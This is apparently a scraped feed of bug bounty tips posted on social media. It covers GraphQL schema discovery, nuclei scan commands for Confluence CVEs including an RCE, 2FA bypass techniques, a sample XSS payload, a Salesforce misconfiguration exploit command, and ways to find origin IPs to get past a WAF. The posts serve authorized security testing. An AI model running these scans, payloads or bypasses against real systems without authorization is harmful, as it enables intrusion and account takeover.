I believe collaboration is key and a great opportunity for people to work together and also to learn a lot from each other. Please feel free to reach out if you'd like to work together on anything you've Identified and need further assistance or widescale exploitation assistance with. Some of the examples are: - Got Invited to a newly launched bug bounty program but can't find any bugs on it or you have already exhausted all bugs and can't find anything else? - Struggling with crafting a XSS payload due to WAF e.g. Akamai, Cloudflare, etc.? - Found a cache deception / poisoning Issue but unable to exploit it further? - Need assistance in escalating XSS to ATO? - Found an Interesting endpoint or a specific wordlist/bypass that works on multiple targets and you would like to check that against my list of targets? - Found a bug on a specific product (e.g. Wordpress, CPanel, etc.) and want to Identify other targets affected by it? - Looking to run your custom nuclei checks against my targets to see If there are any hits? - Everything else! Drop me a DM or leave a comment If would like to collaborate on any of the above. I will be happy to connect and take this forward! Thanks!
41
11
238
18,273
"If you're consistently finding bugs but not earning much, it's not a question of skill—you're just not targeting the right programs." It’s eye-opening that your $250 XSS could be worth $10-30k elsewhere. While you're probably making $2,500 from 10 XSS reports, someone else is earning over $100k for the same amount of reports. The key? Targeting high-paying programs and escalating those bugs to account takeovers. If you're unsure how to escalate, collaborate with someone who knows and split the reward. It’s not just about the money—you’ll end up making more in the long run. My best advice: broaden your scope, team up with others, and start checking out these lucrative programs: 🛒 Amazon 🛍️ Shopify 📹 Zoom ✍️ Grammarly 🎮 Epic Games Feel free to drop more well-paying programs in the comments below! #BugBountyTips #HackerOne #Bugcrowd #YesWeHack #Intigriti #InfoSec #EthicalHacking #BugBounty #CyberSecurity #AppSec
8
23
238
18,227
🚀Question of the day: How to approach GraphQL Targets? Unlock the full potential of GraphQL with these pro tips for tackling your bug bounty targets: 1️⃣ Retrieve the GraphQL Schema for hidden Queries/Mutations: If introspection is enabled, you can obtain the GraphQL Schema, revealing all GraphQL Operations and Mutations using the following GraphQL Query: {"query":"{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"} Introspection Disabled? Don't worry; here are some more ideas that can help you uncover those hidden GraphQL Queries/Mutations: 1️⃣ JavaScript - Retrieve GraphQL Queries and Mutations from JavaScript files when introspection is disabled. These files may list hidden methods not accessible via the app's regular functionality. Try making direct requests to these. 2️⃣ GraphQL Operation discovery via Brute Force - Clairvoyance is an excellent tool that helps obtain the GraphQL API schema via brute force even if introspection is disabled. It produces the GraphQL schema in JSON format. You can install the tool at github.com/nikitastupin/clai…. 3️⃣ View the Schema and Continue Testing - Upload the identified operations/schema to other tools such as GraphQL Voyager, InQL, or graphql-path-enum, and start testing for GraphQL-specific security issues. Next up: We'll talk about JS monitoring for identifying new GraphQL Operations/Mutations that you can be alerted to and test as soon as they're discovered! 🚀💻 #BugBounty #InfoSec #GraphQL #Security #BugBountyTips #HackerOne #BugCrowd #Cybersecurity
10
55
234
22,166
🚨 Hurry! A new Nuclei template for Atlassian Confluence Server - CVE-2023-22518 is now available by iamnoooob,rootxharsh,pdresearch. Scan your confluence targets using the following command and ethically report any quick wins: nuclei -l targets.txt -t CVE-2023-22518.yaml Here's the link to the template - raw.githubusercontent.com/pr… Enjoy! #cybersecuritytips #bugbountytips #securitytips #hackerone #bugcrowd #bounty #tips
2
26
234
25,370
Kudos to @SaltSecurity for the eye-opening article on oAuth misconfiguration that could compromise millions of accounts. This issue persists, as I've discovered a few instances. TLDR: OAuth flaw via 'Login with Facebook' impacts thousands of services. Attackers can exploit tokens from an attacker controlled app with user Interaction to hijack target site accounts due to OAuth misconfigurations. 🔗 Read the full article for a deep dive: salt.security/blog/oh-auth-a… #CyberSecurity #OAuthSecurity #bugbounty #hackerone #securitytips
5
45
229
21,097
🎯Bug Bounty Tips: Common vulnerabilities on apps that support blocking users When targeting apps with user-blocking features, you can unearth potential issues that could lead to quick bounties. Here's an in-depth look at the strategies: 1️⃣ Dive into Documentation - Start by thoroughly examining the app's documentation. Understanding what actions are permitted or prohibited for blocked users is crucial. 2️⃣ Mentioning Users - Test whether mentioning the victim with '@' using a blocked account triggers notifications for the victim. This could be a bug since no interaction should occur via a blocked user. 3️⃣ Leave Comments - Try adding comments as a blocked user on the victim's activities or posts. Look for any unexpected behaviors or security gaps. 4️⃣ Liking Content - Experiment with liking the victim's activities or posts as a blocked user. Determine if the platform allows this action, which could lead to issues. 5️⃣ Replies and Interactions - Explore the possibility of replying to someone's comment as a blocked user on the victim's content. Any interactions that occur can be potential vulnerabilities. 6️⃣ Direct Messaging - Send direct messages or chat messages to the victim using the blocked user account. Observe if the messages are delivered and received successfully, as this could indicate security flaws. These are tried-and-tested methods I've employed over the years. Want to uncover even more insights? Stay tuned for forthcoming tweets! 🕵️‍♂️💰 #BugBounty #InfoSec #EthicalHacking #Cybersecurity #BugBountyTips
8
49
226
13,803
🔍Question of the day: Struggling with dupe results in your Nuclei scans? 📊 Here are some pro tips to help you maximize your bug bounty efforts and stand out from the crowd! 🔒 1️⃣ Be the early bird: Monitor new template additions on github.com/projectdiscovery/… Automate this process and scan your target list automatically to stay ahead of the game and reduce dupes. 2️⃣ Explore new scopes: Keep an eye on fresh bug bounty program invites or newly discovered domains/subdomains. Scanning these early can yield unique findings. 3️⃣Expand your attack surface: Why limit yourself to just one platform? You can broaden your horizons by hunting across multiple platforms! 🎯 Keep an eye on bug bounty assets from various platforms, including new additions, through this link: github.com/arkadiyt/bounty-t… 4️⃣Create custom templates: Craft personalized Nuclei templates tailored to your expertise or unexplored niches. Use AI capabilities at templates.nuclei.sh/template… for automatically creating your private nuclei templates. 5️⃣Stay updated: Follow @infosec_au and his team and other known accounts for tracking the latest vulnerabilities. Monitor assetnote.io/research/rss.xm… for new disclosures, and be the first to create and run Nuclei templates based on their published pocs. You can use templates.nuclei.sh/template… for automatically building the template based on the poc. While this may not cover everything and there are other advanced techniques or ways to gain a competitive edge over others, following these common best practices can still yield good results. 🕵️‍♂️💻 #BugBounty #Nuclei #SecurityResearch #hackerone #bugcrowd #bugbountytips #securitytips
11
45
216
28,133
It's wild how a $50 bounty a few years ago felt more exciting than a $10,000 bounty in 2025. I can't be the only one feeling that way... right? 🤔🤔
19
5
222
18,386
🔍 Bug Bounty Tips: Automate tracking scope changes for your HackerOne/BugCrowd Private Programs Are you on the quest for an edge in your private H1/BugCrowd programs, ensuring you're always in the know about scope changes and additions? Look no further than @sw33tLie's excellent tool - github.com/sw33tLie/bbscope. This nifty utility streamlines the process of fetching HackerOne/Bugcrowd target lists from your public/private Invites. Please note that you'll need to generate API tokens from HackerOne/BugCrowd to make the most of this tool. Here's how you can Install this tool: 👇 GO111MODULE=on go install github.com/sw33tLie/bbscope@… Here's how you can leverage this tool: Step 1: Retrieve all in-scope targets from your HackerOne programs that offer rewards: 🎯 bbscope h1 -t <YOUR_TOKEN> -u <YOUR_H1_USERNAME> -b -o t Sample output: 📋 app[.]example[.]com *.user.example.com *.demo.com www[.]something[.]com Step 2: Do the same for your private Bugcrowd programs with rewards: 🔒 bbscope bc -t <YOUR_TOKEN> -b -p -o t What comes next? 1️⃣ Automate your scope monitoring: Periodically check your target list, compare it with the previous version, and spot scope changes or newly added assets. 2️⃣ Enhance your checks: Incorporate the new scope and targets into your automated testing, including Recon, Subdomain takeover checks, httpx, port scanning, nuclei checks, fuzzing, and more. 3️⃣ Dive into action: Start hunting on these fresh targets, uncover vulnerabilities, and secure those lucrative bounties! Key Takeaways: Continuous automated scope tracking gives you a competitive edge, allowing you to explore uncharted territory and find vulnerabilities before others. Be the pioneer, discover unique issues, and reap substantial rewards! 🚀💰 #BugBounty #InfoSec #Automation #Cybersecurity #BugBountyTips #HackerOne #BugCrowd
2
51
212
13,475
Happy to help🤝🤝💰💰 Here's the Salesforce hacking tips tweet, in case you missed it - nitter.app/Jayesh25_/status/17201… If you've found one of my tweets that helped you secure your bounty, feel free to share. I'll tag you unless you wish to remain anonymous.
Hunting on a target with a Salesforce site? 🕵️‍♂️ You're in luck! 🍀 There's a high likelihood of stumbling upon a misconfigured object that could yield bounties ranging from $1,000 to $5,000 due to the sensitive nature of the data. 😲 Don't be fooled, many hunters overlook these targets, assuming they're safe behind a login page. 😅 However, they're actually one of the most common issues I encounter. Here's a simple approach to spot these vulnerabilities: 1️⃣ Install this amazing tool - 🔧 github.com/moniik/poc_salesf… 2️⃣ Run python3 exploit.py -u https://{{target(.)com -d -s 3️⃣ The tool will automatically scan for object misconfigurations and display objects with result counts. 4️⃣ Found any interesting objects with a result count >0? 🧐 5️⃣ You can explore further in this nice article - 📖 infosecwriteups.com/in-simpl… to exploit the misconfiguration. Hope this helps you on your bug bounty journey. 🚀 Enjoy! 🤑 #CyberSecurity #SecurityTips #BugBountyTips #HackerOne #BugCrowd #DailyTips #Bounties #Bounty
1
25
208
34,389
🤖 The Reality of Bug Hunting Automation 🕵️‍♂️ ">95% automated finds often lead to duplicates! 😱 Skilled automators are everywhere." 🔎 Unfortunately, this is one of the most commonly asked questions by new fellow researchers, often seeking automation strategies in hopes of quick earnings. However, the harsh reality is that these common misconceptions can result in individuals finding no issues at all, potentially causing them to abandon their bug bounty journey. In my experience: (1) I am sitting on 100+ XSS Issues, 20+ subdomain takeovers, and not even bothering to report, as I know they'll be duplicates (I know this for a fact cause these are way too obvious) (2) Reported a manual XSS on a new-scope within 60 mins, It was marked "Dupe" as someone else got it in 15 (That goes to show the level at which people are automating stuff) (3) More than 1000+ Low/Medium findings with nuclei unreported due to high likelihood of dupes. Automation isn't always the answer. However, it doesn't mean you should avoid automation altogether. There are still effective approaches to make it yield results. Next tweet: Unveiling the scenarios where automation can help. Stay tuned! 💡 #BugBounty, #Hackerone, #securitytips, #bugcrowd, #Security
12
18
196
30,600
🐞💰 100+ Reports, $150k+ Bounties: The Collaborative Bug Bounty Journey 🚀 Used to believe solo was the way, but that all changed after attending @Hacker0x01's live hacking event in London. 💡Collaboration is KEY in bug bounties! Since then, I've connected with amazing folks, partnering up and making over $150k in the last 3 months with 100+ submissions to multiple programs. Big shoutout to my collab partners: @monkehack, @H4cktus, @bendtheory, @Shlibness, @soiaxx, and many more. 💪#BugBounty #PowerOfCollaboration #HackerOne, #Bugcrowd, #bugbountytips, @securitytips If you ever find yourself stuck, don't hesitate to reach out. You'd be amazed at the talented people around you ready to help! 💼💡
8
17
201
28,309
🔐 Question of the Day: How to bypass 2FA? Here are some of the known techniques using which you could bypass 2FA on a target app. 1️⃣ Password Reset - Initiate a password reset, follow the link, reset the password, and observe if it grants immediate access to the victim's account without having to go through 2FA 2️⃣ Partial Authentication - Log in using credentials, inspect if the server issues session cookies or JWT tokens, yet still prompts for 2FA. In such cases, attempt utilizing the JWT/Session cookies on the target app APIs without circumventing 2FA – it may just work. 3️⃣ OAuth Login - Check if the target app supports logins via platforms like Google or Facebook. Attempt logging in via a compromised OAuth platform and check If it still asks you for 2FA or lets you in directly 4️⃣ Rate Limit Gap - Examine the 2FA implementation for proper rate limits. If it lacks these limits, consider a brute force attack to guess the correct OTP. 5️⃣ Legacy Paths - Explore if the target app has legacy subdomains or outdated mobile apps that might still be using older login endpoints without 2FA enforcement. These routes could provide a 2FA bypass. 6️⃣ Race Condition Magic - During the authentication process, the app might briefly transition through a state where the user holds a valid logged-in session, but 2FA isn't enforced. An attacker could potentially exploit this by sending a login request alongside a request to a sensitive, authenticated endpoint with the valid session, which may result in a successful bypass. Keep in mind that some programs may categorize these issues as "Informative" because of their high attack complexity, requiring access to the victim's username/password as a prerequisite for these attacks. Stay ethical and responsible! 💡🔒 Please feel free to share your 2FA bypass Ideas in comments below! #cybersecurity #2FA #bugbounty #infosec #ethicalhacking #bugbountytips
3
54
192
11,494
🔍 Question of the Day: How do I hunt for vulnerabilities – manual or automated? 🕵️‍♂️ 👉 I'd say it's a blend! I uncover 1-2 automated Issues a month (that's approx. 2-3k 💰), but the real fun lies in manual finds! Top picks? Insecure Direct Object Reference, Cross Site Request Forgery, and RBAC Issues, which is 10x more :) Stay tuned for more! 💻✨ #CyberSecurity #BugBounty #hackerone
11
20
186
29,775
Congrats @imshehzadahmad! Keep up the great work!! Here's the original bug bounty tip tweet for reference for those that missed it -
Alhamdulillah! First P1 of the new year #2024 Full account takeover via Facebook sign-in,@Bugcrowd team take over my account while validation😂 @jayesh25 Thank you so much, Here In my case there was a bit different trick, But the Idea was the same. #infosec #bugbounty
5
11
179
16,333
Hi, Thank you to everyone who reached out to check on me. I apologize if I haven't been able to respond; I haven't been very active on X lately. I look forward to being more engaged moving forward! 💪💪 Thanks!
26
167
12,174
Scan your targets for CVE-2023-22527: Atlassian Confluence - Remote Code Execution A template injection vulnerability on out-of-date versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected versions. Scan your targets using the following command and ethically report any quick wins: nuclei -l targets.txt -t CVE-2023-22527.yaml Here's the nuclei template from @pdiscoveryio - raw.githubusercontent.com/pr… #CybersecurityTips #BugBountyTips #SecurityTips #HackerOne #BugCrowd #Bounty #Tips
7
22
163
18,319
Here's a technique I use to maximize results and avoid VPS abuse reports while testing for automated XSS or similar vulnerabilities. Malicious payloads are often blocked outright by WAF providers like Akamai, Cloudflare, etc., meaning you won’t even get a chance to work on a WAF bypass—your request will likely be blocked before it even reaches your automated alert. While this approach has some limitations, instead of using intrusive payloads like "><img src='x' onerror='alert(1)', try simplified payloads like "><xss or '"><xss to detect unsanitized reflection. You might need to tweak your existing Nuclei templates, but it’s worth the effort. Once you confirm the target is vulnerable, you can manually test with a true XSS payload or work on bypassing the WAF. :)
4
19
165
11,577
💡Do you skip Android apps during bug hunting? You might be missing out on hidden bugs! 🐛 I’ve had conversations with several hunters who lack confidence or overlook mobile apps, but Android apps often have hidden endpoints or API calls not visible in the web interface. This could mean missing out on valuable findings. 🔍 To discover these, try dynamic analysis: run the app on your device/Genymotion, intercept traffic using tools like Charles Proxy or mitmproxy. Inpsect all API calls and unusual behavior and perform further testing on these to look for IDORs, RBAC, CSRFS, etc. 📂 For static analysis, tools like MobSF allow you to review Java classes for discovering hidden endpoints, or you can extract URLs directly from APKs using apkurlgrep or apk2url. I’ve often found High/Critical bugs in Android apps when the web version had no issues. The takeaway? Always check mobile apps during bug bounties! #BugBountyTips #MobileSecurity #Android #AppSec #BugBounty #HackerOne #BugCrowd #Recon #Intigriti #Yeswehack
4
16
142
12,033
That is awesome - Congrats @skyhex_ and thanks for sharing🎉🥳 Here's the link to the original bug bounty tip tweet for reference In case you missed it -
Thank you so much @jayesh25 for this cool #Bugbounty tip! 🙌🏻
5
7
131
20,941
Since I'm receiving a lot of questions; Here's how you can disallow sharing email when using Login with Facebook: (1) Login with Facebook to any app (2) Click "Edit Access" (3) Uncheck email address checkbox (4) `Continue`
5
22
130
23,928
Using Netlas to Identify the Origin IP of your target 🌐 - There are many known ways to find Origin IPs, but sometimes none of those techniques work. I had a potential SQLi that couldn't be validated due to a really strict WAF 🛡️. After spending hours trying different methods, nothing worked. Then I casually navigated to Netlas, did an HTTP response search using http.title:"My_target_title" (since it was unique to that self-hosted service), and to my surprise, it returned an IP address with the same title, which turned out to be the Origin IP! This helped me bypass the WAF and confirm the SQLi, which I then reported to the program ✅. Moral of the story: you don't always need to rely on running complicated self-hosted tools. If you've got the right ones in your toolkit, use their full features and you'll likely find what you're looking for 🔎. #Netlas #BugBounty #HackerOne #BugCrowd #YesWeHack #Intigriti 🕵️‍♂️
4
11
128
11,129